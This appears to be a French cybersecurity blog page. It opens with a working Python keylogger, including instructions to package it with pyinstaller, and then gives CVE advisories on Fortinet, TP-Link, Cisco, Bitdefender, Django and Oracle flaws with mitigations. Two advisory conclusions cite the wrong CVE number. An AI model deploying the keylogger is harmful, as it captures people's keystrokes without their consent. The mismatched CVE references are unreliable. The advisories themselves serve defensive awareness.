Auteur/autrice : ADCyber

  • PYTHON – Keylogger simple


    Il est bien sûr à adapter en fonction du chemin d’enregistrement du fichier de sortie.

    from pynput import keyboard   # importe le module 'pynput' qui permet d'intercepter les événements clavier
    import os                     # importe le module 'os' pour manipuler les chemins de fichiers et dossiers
    
    # Définit le chemin complet vers le fichier sur le Bureau de l'utilisateur courant
    chemin = os.path.expanduser("~\\Desktop\\file.txt")  
    # os.path.expanduser("~") → retourne le dossier utilisateur courant (ex : C:\Users\Axel)
    # "\\Desktop\\file.txt" → ajoute le sous-dossier Bureau et le nom du fichier
    
    # Fonction appelée à chaque pression d'une touche
    def on_press(key):                      
        # Affiche dans la console la touche pressée
        print("Touche appuyée :", key)  
    
        # Convertit l'objet 'key' (qui peut être une touche spéciale ou un caractère normal) en chaîne de caractères
        k = str(key)          
    
        # Ouvre le fichier en mode "append" pour ajouter du texte à la fin
        # Le 'with' gère automatiquement la fermeture du fichier à la fin du bloc
        # 'f' est une variable temporaire qui représente le fichier ouvert
        with open(chemin, "a", encoding="utf-8") as f:  
            f.write(k + "\n")  # écrit la touche dans le fichier + passe à la ligne suivante
    
    # Crée un Listener pour écouter le clavier
    # on_press=on_press → indique la fonction à appeler à chaque pression d'une touche
    with keyboard.Listener(on_press=on_press) as listener:
        listener.join()  # bloque le programme ici et garde le Listener actif tant qu'il n'est pas arrêté

    Version brute :

    from pynput import keyboard
    import os   
    
    chemin = os.path.expanduser("~\\Desktop\\file.txt")  
    
    def on_press(key):                      
        print("Touche appuyée :", key)  
    
        k = str(key)          
    
        with open(chemin, "a", encoding="utf-8") as f:  
            f.write(k + "\n")  
    
    with keyboard.Listener(on_press=on_press) as listener:
        listener.join() 
    Pour le rendre exécutable, allez dans le cmd :
    > pyinstaller –onefile keylogger.py

  • CVE-2025-59922 – Vulnérabilité dans FortiClientEMS


    DESCRIPTION / CVE-2025-59922– Publié le 13/01/2026

    La vulnérabilité CVE-2025-59922 est une vulnérabilité critique de type « Injection SQL » (neutralisation incorrecte d’éléments spéciaux dans une commande SQL) (CWE-89). Elle a reçu un score de 7,2/10 sur l’échelle CVSS, indiquant un niveau de sévérité HAUT.

    Cette faille est liée à une faiblesse dans FortiClientEMS (Endpoint Management Server)
    Cette vulnérabilité peut permettre à un attaquant authentifié avec au minimum des droits d’administrateur en lecture seule d’injecter et d’exécuter des commandes SQL non autorisées via des requêtes HTTP/HTTPS spécialement forgées adressées à l’interface vulnérable.


    Mécanisme d’exploitation

    La faille repose sur cinq points :

    Exposition de l’interface vulnérable :
    L’interface web/API du service de gestion FortiClientEMS, accessible sur le réseau via HTTP/HTTPS, accepte des requêtes en provenance d’utilisateurs authentifiés avec des privilèges administratifs au moins en lecture seule.
    Insuffisance de neutralisation des entrées :
    Les requêtes traitées par le service ne neutralisent pas correctement des éléments spéciaux dans les paramètres SQL, ce qui permet de manipuler des requêtes destinées à la base de données.
    Injection de commandes SQL :
    Un attaquant authentifié envoie des requêtes HTTP/HTTPS spécialement construites contenant des charges malveillantes. Les paramètres SQL ne sont pas suffisamment filtrés ou échappés, permettant de modifier la logique des requêtes.
    Exécution non autorisée :
    Les commandes SQL injectées s’exécutent dans le contexte de la base de données de FortiClientEMS, permettant potentiellement la lecture, la modification ou la suppression de données sensibles, voire l’exécution de commandes non prévues par les développeurs.
    Impact sur la sécurité globale :
    L’exploitation peut compromettre la confidentialité, l’intégrité et la disponibilité des données gérées par FortiClientEMS ainsi que la configuration des endpoints.

    CORRECTIFS ET RECOMMANDATIONS

    Versions affectées
    FortiClientEMS -> 7.2.0 et 7.2.10
    FortiClientEMS -> 7.4.0 et 7.4.1
    FortiClientEMS -> 7.4.3 et 7.4.4
    Application des correctifs
    Appliquer immédiatement les mises à jour ou correctifs fournis par Fortinet.
    Restriction d’accès aux interfaces
    Limiter l’accès réseau à l’interface de gestion FortiClientEMS (accès restreint via VPN ou segmentation réseau)
    Renforcement des authentifications
    S’assurer que seuls des comptes administrateurs légitimes accèdent aux interfaces de gestion, renforcer les mots de passe et utiliser une authentification multi-facteurs (MFA).
    Surveillance des modifications
    Mettre en place une surveillance accrue des journaux d’accès pour détecter des requêtes HTTP/HTTPS suspectes ou des commandes SQL anormales.
    Principes de moindre privilège
    Éviter de donner des accès d’administration même en lecture seule à des comptes inutiles. Appliquer le principe du moindre privilège dans l’organisation.

    CONCLUSION ET PERSPECTIVES

    La vulnérabilité CVE-2025-59922 illustre qu’un défaut de validation d’entrée, même sur une interface interne ou réservée aux administrateurs, peut conduire à des injections SQL graves affectant la sécurité globale d’un système de gestion des endpoints.

    Cette vulnérabilité rappelle l’importance de :

    • Valider et neutraliser correctement toutes les entrées utilisateurs côté serveur
    • Maintenir les logiciels à jour avec les derniers correctifs de sécurité
    • Restreindre fortement l’accès aux interfaces d’administration, même aux utilisateurs privilégiés.
    Sources

    CVE : https://www.cve.org/CVERecord?id=CVE-2025-59922
    CVE Détails : https://www.cvedetails.com/cve/CVE-2025-59922/
    CWE : https://cwe.mitre.org/data/definitions/89.html
    CERT-FR : https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0035/
    NIST : https://nvd.nist.gov/vuln/detail/CVE-2025-59922
    FortiGuard : https://www.fortiguard.com/psirt/FG-IR-25-735
    E-santé : https://cyberveille.esante.gouv.fr/alertes/fortinet-cve-2025-59922-2026-01-15

  • CVE-2025-14631 – Vulnérabilité dans le routeur Archer BE400 de TP-LINK


    DESCRIPTION / CVE-2025-14631– Publié le 07/01/2026

    La vulnérabilité CVE-2025-14631 est une vulnérabilité critique de type « NULL Pointer Dereference »(déférencement de pointeur nul) (CWE-476) .
    Elle a reçu un score de 7,1/10 sur l’échelle CVSS, indiquant un niveau de sévérité HAUT.

    Cette faille est liée à une faiblesse le module 802.11 du TP‑Link Archer BE400 V1, un adaptateur/répéteur Wi‑Fi 6.
    Elle permet à un attaquant adjacent, sans authentification, d’envoyer une trame spécialement malformée au dispositif via l’interface sans fil, provoquant un redémarrage forcé de l’équipement et conduisant à un déni de service (DoS) des communications du client.


    Mécanisme d’exploitation

    La faille repose sur cinq points :

    Exposition d’un module vulnérable :
    L’équipement Archer BE400 expose une pile de traitement des trames sans fil >802.11, responsable de la réception et de l’analyse des paquets radio entrants.
    Absence de traitement correct des entrées :
    Certaines trames 802.11 malformées entrent dans un code qui ne vérifie pas si les pointeurs utilisés sont valides, menant à une référence à un pointeur NULL dans la mémoire.
    Injection de trame malveillante :
    Un attaquant situé à portée radio peut envoyer une seule trame spécialement construite sans aucun besoin d’authentification ou d’interaction utilisateur.

    Réinitialisation et DoS :
    Le traitement de la trame malveillante provoque une crash immédiat du logiciel interne du module sans fil, entraînant un redémarrage complet de l’appareil. Pendant ce redémarrage, toutes les connexions sont interrompues et le réseau Wi‑Fi devient indisponible.
    Impact sur la disponibilité :
    L’exploitation répétée peut maintenir l’appareil dans un cycle de reboot, rendant l’accès réseau instable ou inutilisable pour tous les clients.

    CORRECTIFS ET RECOMMANDATIONS

    Version affecté
    Archer BE400 -> xi 1.1.0 Build 20250710 rel.14914
    Mise à jour du firmware
    Installer la version de firmware corrective fournie par TP‑Link pour l’Archer BE400
    Réduction de la surface d’attaque
    Limiter l’accès radio à l’appareil (ex. augmenter les protections physiques/géographiques)
    Surveillance et détection
    Mettre en place des mécanismes de surveillance des pertes de services périodiques ou des redémarrages anormaux sur les équipements réseau

    CONCLUSION ET PERSPECTIVES

    La vulnérabilité CVE-2025-59922 illustre que même des composants bas‑niveau du traitement des protocoles sans fil peuvent introduire des failles graves, même sans authentification requise. La logique de traitement des trames 802.11 malformées est critique, car une erreur peut affecter la disponibilité complète d’un dispositif réseau, impactant potentiellement tout un environnement connecté.

    Cette vulnérabilité rappelle l’importance de :

    • Tester rigoureusement les piles protocolaires réseau
    • Appliquer immédiatement les mises à jour firmware sur les matériels réseau
    • Segmenter et protéger les infrastructures Wi‑Fi contre des attaques par proximité physique
    Sources

    CVE : https://www.cve.org/CVERecord?id=CVE-2025-14631
    CVE Détails : https://www.cvedetails.com/cve/CVE-2025-14631/
    CWE : https://cwe.mitre.org/data/definitions/476.html
    NIST : https://nvd.nist.gov/vuln/detail/CVE-2025-14631
    TP-Link : https://www.tp-link.com/uk/support/faq/4871/
    E-santé : https://cyberveille.esante.gouv.fr/alertes/tp-link-cve-2025-14631-2026-01-07

  • Déploiement de GLPI sur serveur Apache2 (Debian)


    Les étapes présentes dans cette documentation :

    • Téléchargement et installation des prérequis
    • Téléchargement de GLPI
    • Création d’un VirtualHost
    • Installation de GLPI via interface web
    • Manipulation de GLPI
      • Ajout d’un utilisateur
      • Remontée d’informations avec l’Agent GLPI
      • Association d’un PC à un utilisateur
      • Création d’intitulés
  • CVE-2025-20393 -Vulnérabilité dans Cisco AsyncOS

    DESCRIPTION / CVE-2025-20393 Publié le 17/12/2025

    La vulnérabilité CVE-2025-20393 est une vulnérabilité critique de type « Missing Authentication for Critical Function » (manque d’authentification pour une fonction essentielle). Elle a reçu un score de 10/10 sur l’échelle CVSS, indiquant un niveau de sévérité CRITIQUE.

    Cette faille est liée à une faiblesse dans le logiciel Cisco AsyncOS, utilisé par les appliances Cisco Secure Email Gateway (SEG) et Cisco Secure Email and Web Manager.
    Il s’agit d’une défaillance de validation insuffisante des entrées, permettant à un attaquant distant non authentifié d’exécuter du code arbitraire à distance avec des privilèges root sur l’équipement vulnérable.


    Mécanisme d’exploitation

    La faille repose sur cinq points :

    Exposition d’un service vulnérable :
    L’appliance Cisco expose une interface web accessible via le réseau (HTTPS/HTTP), spécifique pour l’administration ou la gestion de la quarantaine des messages.
    Ce service traite des requêtes provenant directement de clients distants.
    Absence de validation stricte des entrées :
    Certaines requêtes envoyées à cette interface contiennent des paramètres utilisateur insuffisamment contrôlés.
    Les données reçues ne sont pas correctement validées avant d’être transmises aux composants internes du système.
    Injection de données compromettantes :
    L’attaquant distant transmet une requête spécialement construite incluant des valeurs inattendues ou malformées dans les paramètres traités par l’application.
    Aucune authentification n’est nécessaire pour atteindre ce point.
    Traitement incorrect par le composant interne :
    En raison de la faille de validation, les données transmises sont interprétées par des processus système internes avec des privilèges élevés.
    Cela provoque un comportement non prévu dans la gestion des commandes ou des appels système.
    Exécution de code au niveau système :
    L’attaquant exploite ce comportement pour obtenir une exécution de code arbitraire avec des privilèges root, lui donnant un contrôle total sur l’appliance vulnérable.

    CORRECTIFS ET RECOMMANDATIONS

    Application des correctifs
    Mettre à jour immédiatement les appliances concernées vers une version corrigée.
    Restriction des interfaces
    Restreindre l’exposition des interfaces d’administration (filtrage IP, accès VPN).
    Surveillance des journaux
    Surveiller les journaux et comportements anormaux pouvant indiquer une exploitation.
    Limitation d’accès et permissions
    Appliquer le principe du moindre privilège et accroître la segmentation réseau.

    CONCLUSION ET PERSPECTIVES

    La vulnérabilité CVE‑2025‑64459 prouve que les équipements de sécurité exposés sur le réseau deviennent eux-mêmes des cibles privilégiées, car leur compromission offre un point de contrôle stratégique aux attaquants.

    Cette vulnérabilité rappelle l’importance de :

    • La gestion rigoureuse des surfaces d’exposition réseau
    • Maintenir les logiciels à jour
    • La restriction des périmètres au sein de l’infrastructure
    Sources

    CVE : https://www.cve.org/CVERecord?id=CVE-2025-20393
    CWE : https://cwe.mitre.org/data/definitions/20.html
    CERT-FR : https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-1120/
    Cisco : https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sma-attack-N9bf4

  • CVE-2025-7073 – Vulnérabilité dans l’ATC de Bitdefender


    DESCRIPTION / CVE-2025-7073 – Publié le 10/12/2025

    La vulnérabilité CVE-2025-7073 est une vulnérabilité critique de type « Local Privilege Escalation »(élévation de privilèges) et « Link Following »(CWE-59) .
    Elle a reçu un score de 8,8/10 sur l’échelle CVSS, indiquant un niveau de sévérité HAUT.

    Cette faille est liée à une faiblesse dans l’ATC (Advanced Threat Control) de Bitdefender.
    La vulnérabilité permet à un attaquant de manipuler des fichiers critiques en créant des liens symboliques (symlinks) dans un dossier surveillé par le service Bitdefender.


    Mécanisme d’exploitation

    La faille repose sur six points :

    Présence d’un dossier accessible aux utilisateurs :
    Le service Bitdefender ATC utilise un répertoire spécifique
    > C:\ProgramData\Atc\Feedback, pour stocker et traiter des fichiers temporaires ou de diagnostic. Ce répertoire est accessible en écriture par des utilisateurs locaux non privilégiés.
    Création d’un lien symbolique malveillant :
    Un attaquant local crée, dans ce répertoire, un lien symbolique pointant vers un fichier système ou un fichier critique de son choix. Ce lien est conçu pour ressembler à un fichier légitime attendu par le service Bitdefender.
    Absence de validation des liens symboliques :
    Lors du traitement ou du nettoyage du répertoire, le service Bitdefender ne vérifie pas si le fichier manipulé est un lien symbolique ni vers quelle cible il pointe réellement.
    Exécution d’une opération avec privilèges élevés :
    Le service, exécuté avec les privilèges SYSTEM, applique une opération (suppression, remplacement ou écrasement) sur le fichier ciblé par le lien symbolique, pensant agir sur un simple fichier temporaire.
    Modification ou suppression de fichiers critiques :
    L’opération est alors appliquée directement au fichier réel pointé par le lien symbolique, permettant à l’attaquant d’altérer des fichiers système ou de préparer l’injection de code malveillant.
    Élévation de privilèges :
    En exploitant ce comportement, l’attaquant peut obtenir une élévation de privilèges locale et exécuter du code ou des actions avec des droits équivalents à ceux du service Bitdefender.

    CORRECTIFS ET RECOMMANDATIONS

    Version corrigées
    Total Security >= v27.10.45.497
    Internet Security & Antivirus Plus >= v27.10.45.497
    Antivirus Free >= v30.0.25.77
    Endpoint Security Tools for Windows >= v7.9.20.515
    Application des correctifs
    Mettre à jour instantanément tous les produits Bitdefender mentionnés vers les versions corrigées afin d’éliminer la vulnérabilité.
    Limitation des permissions
    Limiter les comptes utilisateurs à des privilèges stricts lorsqu’ils n’ont pas besoin d’accès particuliers.
    Accessibilité
    Vérifier les permissions des dossiers sensibles afin d’éviter qu’un répertoire d’application ne soit accessible en écriture non contrôlée par des utilisateurs non privilégiés.
    Surveillance de modifications
    Surveiller les modifications de fichiers système, en particulier dans les actions automatisées d’antivirus ou de processus d’élévations de leurs droits.

    CONCLUSION ET PERSPECTIVES

    La vulnérabilité CVE-2025-7073 illustre comment une simple erreur de validation de liens symboliques dans un composant de sécurité peut devenir une faille d’élévation de privilèges grave, malgré le fait que le composant soit censé protéger le système.

    Cette vulnérabilité rappelle l’importance de :

    • Filtrer et contrôler les permissions utilisateurs
    • Valider explicitement et avec attention chaque opération du système de fichier
    • Maintenir les logiciels à jour
    Sources

    CVE : https://www.cve.org/CVERecord?id=CVE-2025-7073
    CWE : https://cwe.mitre.org/data/definitions/59.html
    CERT-FR : https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-1089/
    Bitdefender : https://www.bitdefender.com/support/security-advisories/local-privilege-escalation-via-arbitrary-file-operation-in-bitdefender-atc-va-12590/
    NIST : https://nvd.nist.gov/vuln/detail/CVE-2025-7073

  • CVE-2025-64459 – Vulnérabilité dans l’ORM de Django


    DESCRIPTION / CVE-2025-64459 – Publié le 05/11/2025

    La vulnérabilité CVE-2025-64459 est une vulnérabilité critique de type « Injection SQL » (manipulation malveillante d’une requête SQL générée par l’ORM de Django et destinée à la base de données). Elle a reçu un score de 9.1/10 sur l’échelle CVSS, indiquant un niveau de sévérité CRITIQUE.

    Cette faille est liée à une faiblesse dans l’ORM (Object Relational Mapper) de Django.
    En pratique, la vulnérabilité permet à un utilisateur malveillant de détourner la manière dont certaines requêtes SQL sont générées, ouvrant la voie à une extraction ou une modification non autorisée de données sensibles.


    Mécanisme d’exploitation

    La faille repose sur cinq points :

    Identification d’une entrée manipulable :
    L’attaquant repère une fonctionnalité qui intègre directement des données utilisateur dans un dictionnaire transmis à l’ORM via une expansion.
    Injection d’un paramètre interne :
    Il introduit dans ces données un paramètre interne réservé à Django >_connector, normalement inaccessible.
    Acceptation du paramètre par l’ORM :
    En raison de la faille, Django ne filtre pas ce paramètre lorsqu’il provient d’un dictionnaire expansé et l’intègre dans la construction de la requête.
    Altération de la logique SQL générée :
    La présence de ce paramètre modifie la manière dont l’ORM assemble les conditions, entraînant la création d’une requête SQL déviée.
    Exploitation de la requête modifiée :
    L’attaquant profite du comportement non prévu de la requête pour contourner des restrictions ou accéder à des données sensibles.

    CORRECTIFS ET RECOMMANDATIONS

    Application du correctif
    La vulnérabilité a été corrigée dans les versions officielles de Django. Les utilisateurs doivent mettre à jour leur framework vers les versions corrigées pour éliminer la faille.
    Transmission de dictionnaires
    Éviter de transmettre directement des dictionnaires contenant des données utilisateur dans les méthodes de l’ORM.
    Mise en place de validation
    Mettre en place une validation stricte des données pour empêcher l’introduction de paramètres inattendus.
    Limitation des permissions
    Limiter les permissions du compte base de données qui vise à réduire les dégâts en cas d’exploitation.
    Source correctif

    Dépot Github : https://github.com/django/django/commit/98e642c69181c942d60a10ca0085d48c6b3068bb

    CONCLUSION ET PERSPECTIVES

    La vulnérabilité CVE‑2025‑64459 montre qu’une faille peut exister même dans des composants réputés sûrs comme l’ORM de Django. Elle illustre que la sécurité d’un framework ne garantit pas automatiquement la protection contre toutes les injections SQL.

    Cette vulnérabilité rappelle l’importance de :

    • Maintenir les frameworks à jour.
    • Valider et filtrer les entrées utilisateur.
    • Limiter les permissions des comptes de base de données.
    Sources

    CVE : https://www.cve.org/CVERecord?id=CVE-2025-64459

    Github Django : https://github.com/django/django/commit/98e642c69181c942d60a10ca0085d48c6b3068bb

    DjangoProject : https://www.djangoproject.com/weblog/2025/nov/05/security-releases/

    Exploit DATABASE : https://www.exploit-db.com/exploits/52456

    NIST : https://nvd.nist.gov/vuln/detail/CVE-2025-64459

  • CVE-2025-61757 – Vulnérabilité dans Oracle Identity Manager


    DESCRIPTION / CVE-2025-61757 – Publié le 21/10/2025

    La vulnérabilité CVE-2025-61757 est une vulnérabilité critique de type « Missing Authentication for Critical Function » (manque d’authentification pour une fonction essentielle). Elle a reçu un score de 9,8/10 sur l’échelle CVSS, indiquant un niveau de sévérité CRITIQUE. Cette faille permet à un attaquant non authentifié d’exécuter du code à distance (RCE) sur les systèmes vulnérables.

    Matrice des risques

    CVE IDPRODUITCOMPOSANTPROTOCOLEEXPLOITATION À
    DISTANCE SANS
    AUTHENTIFICATION
    CVE-2025-61757Gestionnaire d’identitéServices Web RESTHTTPOui
    SCORE DE BASE VECTEUR D’ATTAQUECOMPLEXE D’ATTAQUEPRIVILÈGES REQUISINTERRACTION DE L’UTILISATEUR
    9.8RéseauFaibleAucunAucun
    PORTÉECONFIDENTIALITÉINTÉGRITÉDISPONIBLITÉVERSION PRISE EN CHARGE CONCERNÉE
    InchangéHautHautHaut12.2.1.4.0, 14.1.2.1.0
    Source

    Matrices des risques / Oracle Corporation

    Mécanisme d’exploitation

    La faille repose sur six points :

    Contournement des contrôles d’accès :
    La vulnérabilité exploite un défaut dans le filtre de sécurité d’OIM, qui est censé protéger les endpoints (points d’accès) de l’application.
    Manipulation des requêtes :
    En ajoutant des suffixes spécifiques (comme ?WSDL ou ;.wadl) à certaines URLs, un attaquant peut accéder à des endpoints normalement protégés, comme s’ils étaient publics.
    Exécution de code malveillant :
    Une fois l’accès obtenu, l’attaquant peut exploiter une fonctionnalité de compilation de scripts Groovy (utilisée par OIM) pour exécuter du code arbitraire sur le serveur, avec les mêmes privilèges que le service OIM.
    Prise de contrôle du système :
    Un attaquant peut obtenir un accès complet à OIM, ce qui lui permet de voler des données sensibles (identifiants, mots de passe, etc.), de modifier des comptes utilisateurs, ou de s’infiltrer dans d’autres parties du réseau de l’entreprise.
    Exploitation active :
    Des attaques exploitant cette faille ont été observées dès fin août 2025, parfois avant même la publication du correctif (Zero-Day).
    Systèmes concernés :
    Oracle Identity Manager (OIM) dans Oracle Fusion Middleware, versions 12.2.1.4.0 et 14.1.2.1.0

    CORRECTIFS ET RECOMMANDATIONS

    Application du correctif
    Oracle a publié un correctif dans son Critical Patch Update d’octobre 2025. Il est impératif pour les organisations utilisant OIM de mettre à jour leurs systèmes sans délai.
    Surveillance des requêtes suspectes
    Les équipes de sécurité doivent surveiller les requêtes contenant les suffixes ;.wadl ou ?WSDL, qui peuvent indiquer une tentative d’exploitation de la failles.
    Renforcement des mesures de sécurité
    Il est recommandé de renforcer l’authentification sur tous les endpoints OIM et de limiter l’accès réseau aux systèmes concernés.

    CONCLUSION ET PERSPECTIVES

    La vulnérabilité CVE-2025-61757 illustre l’importance cruciale de la gestion des vulnérabilités dans les outils de gestion des identités, qui sont des cibles privilégiées pour les cyberattaquants. Pour les entreprises, cela souligne la nécessité de :

    • Maintenir une veille active sur les mises à jour de sécurité.
    • Tester régulièrement la robustesse de leurs systèmes IAM*.
    • Former les équipes aux bonnes pratiques de cybersécurité.

    Cette vulnérabilité rappelle aussi que les outils de gestion des identités, bien que conçus pour renforcer la sécurité, peuvent eux-mêmes devenir des points d’entrée critiques s’ils ne sont pas correctement maintenus.

    IAM

    Identity & Access Management

    Sources

    CVE : https://www.cve.org/CVERecord?id=CVE-2025-61757
    Oracle : https://www.oracle.com/security-alerts/cpuoct2025.html#AppendixFMW
    CISA : https://www.cisa.gov/news-events/alerts/2025/11/21/cisa-adds-one-known-exploited-vulnerability-catalog